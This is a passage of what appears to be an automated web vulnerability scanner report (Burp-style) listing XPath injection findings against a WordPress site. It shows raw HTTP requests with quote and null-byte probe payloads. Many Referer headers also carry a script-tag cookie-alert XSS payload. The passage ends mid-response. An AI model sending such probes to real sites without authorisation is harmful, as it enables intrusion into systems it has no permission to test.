Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:22 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.80. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js'/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.81. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:45 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.82. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:15 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.83. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.84. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:03 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.85. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.86. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:35 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.87. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js'/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.88. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.89. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:29 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.90. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:55 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.91. http://www.installsoftware.com/xmlrpc.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /xmlrpc.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /xmlrpc.php' HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.92. http://www.installsoftware.com/xmlrpc.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /xmlrpc.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /xmlrpc.php HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.93. http://www.installsoftware.com/xmlrpc.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /xmlrpc.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /xmlrpc.php?1%00'=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:16 GMT
